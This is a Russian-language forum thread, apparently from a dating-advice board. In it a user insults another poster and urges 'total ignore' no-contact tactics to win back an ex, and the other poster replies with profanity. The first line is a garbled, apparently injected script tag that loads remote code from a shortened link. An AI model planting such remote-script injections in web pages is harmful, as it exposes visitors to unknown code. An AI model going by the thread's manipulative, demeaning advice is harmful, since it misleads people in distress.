<script type="text/oops" src="http://is.gd/J87Pzs"...7Pzs"></script>
Бывалый56 сказал(а) 25 Май 2017 - 18:08:
Парень, тебе правильно пишут. Ты чертов тфн. Ты ей не интересен на данный момент. Она тебя сливает потому что не видит, что ты меняешься, не делаешь левелап, а продолжаешь ныть как сопляк и бегать вокруг неё.
Девушки любят не мальчиков-няшек а твёрдых мужиков, которые уверенно идут по жизни, знают к чему стремятся и постоянно работают над собой. Ты такой мужик? Ответь себе честно.
Её можно вернуть, даже можно сделать так, чтобы она сама за тобой побежала. Но для этого нужен тотальный игнор блять. Никаких контактов. Забудь про неё и просто развивай себя. Т100б, т10д!
Когда она, случайным образом увидит тебя нового, тогда ты будешь выглядеть в её глазах новым и интересным парнем, и тогда начнёт за тобой бегать. Но запомни, ты не должен с ней контактировать ниразу, пока не изменишь себя.
Работай а не ной, советов и так уже достаточно..
Красавчик,в чем я должен измениться,я развиваюсь и так,дома мозги не ебу не сижу,если человеку я на хуй не нужен,что я должен сделать?я не отрицаю может с ней где то не по мужски себя повел,но в том,что я мозгоеб не надо говорить,слов нет стремиться нужно всегда к высшей цели.